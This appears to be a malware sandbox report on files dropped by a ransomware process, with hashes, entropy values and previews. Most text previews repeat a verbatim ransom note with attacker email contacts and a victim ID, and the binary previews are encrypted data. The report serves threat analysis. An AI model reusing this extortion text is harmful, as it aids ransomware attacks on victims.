                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.184816757442119
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:0zUtEQ6hz6PalhRsWiziJy8H2oNyEZfH1EVjNA5QW03wn:0zY6hz2KJiziJyvo7HAjK0An
                                                                                                                                              MD5:DAF48B555C0D89BE8F9563CAC535D895
                                                                                                                                              SHA1:E13F34AB14A7A4ECB3CAEE88001B795520E827C4
                                                                                                                                              SHA-256:A6B69745475797297405620F5F2ED46048560DB3A5CB3F943B839BF4367BABF5
                                                                                                                                              SHA-512:8E74E0C291250CB70A82E5B02506A9A0FD5FBA34DFBF2D23BA4AC0A334861D5A3B9A627226021838ED00135D8AE65814FDC6555B851E06570E55F20257B452AC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:Q.Qr).W.:...E.|...........&..5Q./W.5..B..xR9...p.....u....B..s.mt.......e.yW.T$..X....7...]U...d.b.b6$D&..Sk.N0P..'.!....d.P.!..<.sk.o..?ak...........OP".n....k...~a..b.b;|. ...{.j._.Z...2.*TI.&}g.q.....Xj\...oD.....D..V`.l...F...Lv.W..J..xe.8....[.]\..t:..C.j.O..^S.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):290
                                                                                                                                              Entropy (8bit):7.271418476153324
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:qV1hlQdVwbyXYftcoLUrzQdoKzrSw5XH+RYnDh87IbqB/2/o7wn:uzm980rEdoRw53BDhXi/2/okn
                                                                                                                                              MD5:57DD0063EBA2F9F86DD91EE5F9F08531
                                                                                                                                              SHA1:FD5FDBEC3B20E4F4E5AD5532A4F2259241DE54AA
                                                                                                                                              SHA-256:BC06613080D16B48BBB383B96C78E879669F4CF4CB54CB65177F4237E3685F79
                                                                                                                                              SHA-512:2E20F0EE5538250987F12B0D6573D7603C91F1755339B6C8A9F79B055E62730D217EC456384ABE4295B82B25064A5FA99B043500626F5F842D88C863AC7210A3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:Z..0...%.;............@..U...r{.mz.n.`.M...j.....2...[}.........E.T../.#~...2..B.k..........>..%f.M.....Y...S9...7V.s...'._..&.of.(b9=..'.u.Qwz..0.[.+.=8...HJ).O?Q+...h....sG.}.....I|.*..LV.Z".\....[....n.....&.z...C0.EK..o..O%1m..Q...m......j....y.<F.t<.....R...0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):290
                                                                                                                                              Entropy (8bit):7.271418476153324
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:qV1hlQdVwbyXYftcoLUrzQdoKzrSw5XH+RYnDh87IbqB/2/o7wn:uzm980rEdoRw53BDhXi/2/okn
                                                                                                                                              MD5:57DD0063EBA2F9F86DD91EE5F9F08531
                                                                                                                                              SHA1:FD5FDBEC3B20E4F4E5AD5532A4F2259241DE54AA
                                                                                                                                              SHA-256:BC06613080D16B48BBB383B96C78E879669F4CF4CB54CB65177F4237E3685F79
                                                                                                                                              SHA-512:2E20F0EE5538250987F12B0D6573D7603C91F1755339B6C8A9F79B055E62730D217EC456384ABE4295B82B25064A5FA99B043500626F5F842D88C863AC7210A3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:Z..0...%.;............@..U...r{.mz.n.`.M...j.....2...[}.........E.T../.#~...2..B.k..........>..%f.M.....Y...S9...7V.s...'._..&.of.(b9=..'.u.Qwz..0.[.+.=8...HJ).O?Q+...h....sG.}.....I|.*..LV.Z".\....[....n.....&.z...C0.EK..o..O%1m..Q...m......j....y.<F.t<.....R...0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):290
                                                                                                                                              Entropy (8bit):7.208571708949248
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:V+4ZPYb61hjdTyz1NDduHgTiBiwX+gvM7A8/ApTHZGM2n:YbUhsQHguBkqtVG1n
                                                                                                                                              MD5:8C4AF2232CC71FA5E783CF74AEE30583
                                                                                                                                              SHA1:063FF1ABCAE662582A8558315D3F2A065545E25D
                                                                                                                                              SHA-256:9450D77298B6A4806C18B721D941DAD7B82914B69A61B9482A3A407670DEA3C9
                                                                                                                                              SHA-512:660A1447D595EF937278D25C3BFD8C480ED794E501BFDAA2051CD0C974C9E2A03566FD8C4CE42D9D956ABB1435B22C9EB47FAAEC6B9AB2219543BB01A7AF874C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.........Q.g...pxR.=>......G..H.C....D}8.,.*.cx.B..xu...M:...1..G.Qd5.7h..F.(..oI....J..A0...Ot\..A..H..0.{V........6G^...S$Yv.p....F-..P...j.......?..........h...X..\...U....g.d..^............mF...!........XK5.e.Ey.....QA....y].p.|.l..A..-..al...9.S.a.k...E..0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):290
                                                                                                                                              Entropy (8bit):7.208571708949248
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:V+4ZPYb61hjdTyz1NDduHgTiBiwX+gvM7A8/ApTHZGM2n:YbUhsQHguBkqtVG1n
                                                                                                                                              MD5:8C4AF2232CC71FA5E783CF74AEE30583
                                                                                                                                              SHA1:063FF1ABCAE662582A8558315D3F2A065545E25D
                                                                                                                                              SHA-256:9450D77298B6A4806C18B721D941DAD7B82914B69A61B9482A3A407670DEA3C9
                                                                                                                                              SHA-512:660A1447D595EF937278D25C3BFD8C480ED794E501BFDAA2051CD0C974C9E2A03566FD8C4CE42D9D956ABB1435B22C9EB47FAAEC6B9AB2219543BB01A7AF874C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.........Q.g...pxR.=>......G..H.C....D}8.,.*.cx.B..xu...M:...1..G.Qd5.7h..F.(..oI....J..A0...Ot\..A..H..0.{V........6G^...S$Yv.p....F-..P...j.......?..........h...X..\...U....g.d..^............mF...!........XK5.e.Ey.....QA....y].p.|.l..A..-..al...9.S.a.k...E..0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):734
                                                                                                                                              Entropy (8bit):7.664284924180795
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:bBYle7eOY6zLL5QSr1LmVCtQt3SFqPJBiFzNvyzMaHccyZ758whCEET5BTSJ0ojt:tYCeOYuLL5Qq1CVTt3VPJBinvnaH+Z7H
                                                                                                                                              MD5:D2E3E73657149693824EDC7B26706D69
                                                                                                                                              SHA1:F54FD6B27A5FDE9C6F81E4EFD8C5BADB33B15175
                                                                                                                                              SHA-256:5FFBA865CE8130E1243CCA54FD0E9A269A1E573FBACB9BDB0A1832CB5F3F6E80
                                                                                                                                              SHA-512:BBE41CDAB15AB7761730E680621191A63DC2A42C859F0F5A4EE8EDA6746A726B95BDB232CD4C6B35AA2A8C0A354B73BC788253F5AE88BBDF3672D22738C0007A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.6.Qk...I.ayC.X........6X...a.}.lv..I...)W.Lv1........._........B....g"`.\2Yw..,;.f..2L%....B#6.......G.j.z.U......0.s..k..N..?A......4.Up.u.t..|10......K.T........6l..f.~....R...&86...-.;7.qo.RF.U.IO.w...Y.43...a.j._.{...F4^..F...=.R...z.m."..)[)z.....9z..3h.g.5...s>...)..C.......z.oz6.l%....... Z..!P.m...61P..__...9.k&....v..K..[*-.....d.Z,.....-.E.;..".....x..%..F......1l..""..6.....B...&......Cx....Z....n...=P...A.!..........Ch0{Y. ...|.G...&...P.~&N,6*.v.r.rv..d.C1.{#..&.A...z.OJY..>[Z.'2.....1..k....2.;G.>L.U./x.....;...n.........Q..(.(....g...j..].Cu...WRv..c1`_W.f.E........+.2..;CN.L.......k.j...[..4...qx.....0. ..9.M....%...O...,,........1#...^..^p.^. O. .#.e-.v.....0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):734
                                                                                                                                              Entropy (8bit):7.664284924180795
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:bBYle7eOY6zLL5QSr1LmVCtQt3SFqPJBiFzNvyzMaHccyZ758whCEET5BTSJ0ojt:tYCeOYuLL5Qq1CVTt3VPJBinvnaH+Z7H
                                                                                                                                              MD5:D2E3E73657149693824EDC7B26706D69
                                                                                                                                              SHA1:F54FD6B27A5FDE9C6F81E4EFD8C5BADB33B15175
                                                                                                                                              SHA-256:5FFBA865CE8130E1243CCA54FD0E9A269A1E573FBACB9BDB0A1832CB5F3F6E80
                                                                                                                                              SHA-512:BBE41CDAB15AB7761730E680621191A63DC2A42C859F0F5A4EE8EDA6746A726B95BDB232CD4C6B35AA2A8C0A354B73BC788253F5AE88BBDF3672D22738C0007A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.6.Qk...I.ayC.X........6X...a.}.lv..I...)W.Lv1........._........B....g"`.\2Yw..,;.f..2L%....B#6.......G.j.z.U......0.s..k..N..?A......4.Up.u.t..|10......K.T........6l..f.~....R...&86...-.;7.qo.RF.U.IO.w...Y.43...a.j._.{...F4^..F...=.R...z.m."..)[)z.....9z..3h.g.5...s>...)..C.......z.oz6.l%....... Z..!P.m...61P..__...9.k&....v..K..[*-.....d.Z,.....-.E.;..".....x..%..F......1l..""..6.....B...&......Cx....Z....n...=P...A.!..........Ch0{Y. ...|.G...&...P.~&N,6*.v.r.rv..d.C1.{#..&.A...z.OJY..>[Z.'2.....1..k....2.;G.>L.U./x.....;...n.........Q..(.(....g...j..].Cu...WRv..c1`_W.f.E........+.2..;CN.L.......k.j...[..4...qx.....0. ..9.M....%...O...,,........1#...^..^p.^. O. .#.e-.v.....0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.121740470518791
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:aZ/ROuGgLHGd20eHo6Ol3nvJdlYatYgAQEloip+7ocgc3mn:avGgLHG80F6c3nflYatYgAsuqgc3mn
                                                                                                                                              MD5:BBB89FAA3430C8E38C6941EAA21DFD6E
                                                                                                                                              SHA1:F115266DD8C6D1371C355F31CA579289F47922A0
                                                                                                                                              SHA-256:5D2FB9A1E78454FB916749C6959A48A6CC4D7282A68A563FE16CEEA81B3F6A4D
                                                                                                                                              SHA-512:78D15CCDBAB5651BF673A21C8E02B30AF599D19318063827173A2CB56660FEFF6DD7DBF2E7637FCB524E87922E3F6E85B5D15D789C6A056C0BF9FF2E4258182A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...\....v..H.[...........r..{X_Q.]....ll..A..Fbk.P...,.3...:.....1......e.....1.H....I.J.V....b.K|...R.'.}.......y,...MJ..V.h.0}...V...nN....%/;.o..v...K...(.0...w...FP2....e;".....|.=.c.9..w..50a..:n.".......x...|z;1....1.Zlq:.0`.^ek.......*..0.s.C-..2.}j...?.|N%B0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
